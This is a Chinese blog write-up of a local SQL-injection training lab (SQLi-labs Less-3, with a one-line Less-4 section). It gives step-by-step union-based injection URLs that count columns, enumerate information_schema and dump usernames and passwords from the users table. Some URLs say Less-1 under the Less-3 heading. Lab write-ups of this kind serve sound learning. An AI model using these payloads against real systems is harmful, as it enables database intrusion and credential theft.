靶场攻击利用

1) 第三关: Less-3
访问第一关主页,显示输入 id 参数

 查看后端代码 index.php,可看到实际查询的语句

输入 http://127.0.0.1:8888/Less-3/?id=1’)and 1=2 -- -,发现存在 sql 注入漏洞  

检索字段数 http://localhost:8888/Less-1/?id=1’ )order by 4 -- -,执行失败,列数为3

 使用联合语句 union 来查询

 输入 http://localhost:8888/Less-1/?id=444’) union select 1,2,3 -- -,成功执行全部列记录,

发现只有 2 3 可以用,接下来我们就利用 2 3 来查询数据库的信息

联合利用数据库内置函数:
输入 http://localhost:8888/Less-1/?id=444') union select 1,2,database() -- - ;爆出当前数据
库名 :security

 联合利用 mysql 数据库本身的 information_schema

输 入 http://localhost:8888/Less-1/?id=444') union select 1,2,group_concat(table_name)

from information_schema.tables where table_schema='security' -- - ;爆出 security 数据
库所有表名
输入 http://localhost:8888/Less-1/?id=444')union select 1,2,group_concat(column_name)
from information_schema.columns where table_schema='security' and table_name='users'
-- - ;爆出 users 表列名

 

输入 http://localhost:8888/Less-1/?id=444') union select 1,2,group_concat(username,'--
',password) from security.users -- - ;爆出关键敏感信息

 

 1) 第四关:Less-4

操作如上:完成图例如下

 

 

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值